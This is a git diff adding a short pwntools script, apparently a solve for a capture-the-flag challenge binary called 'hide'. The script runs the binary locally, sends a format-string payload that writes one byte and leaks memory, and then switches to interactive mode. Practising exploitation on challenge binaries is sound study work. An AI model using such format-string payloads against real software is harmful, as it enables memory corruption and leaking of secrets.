diff --git a/random_challs/hide/a.py b/random_challs/hide/a.py new file mode 100644 index 0000000..7273e22 --- /dev/null +++ b/random_challs/hide/a.py @@ -0,0 +1,14 @@ +#!/usr/bin/python3 + +from pwn import * + +context.binary = target = ELF("./hide", checksec=False) +r = process() + +# funcs +s = lambda a: r.sendline(a) + +# buf +s(b"%160c%hhn%6$s") + +r.interactive() \ No newline at end of file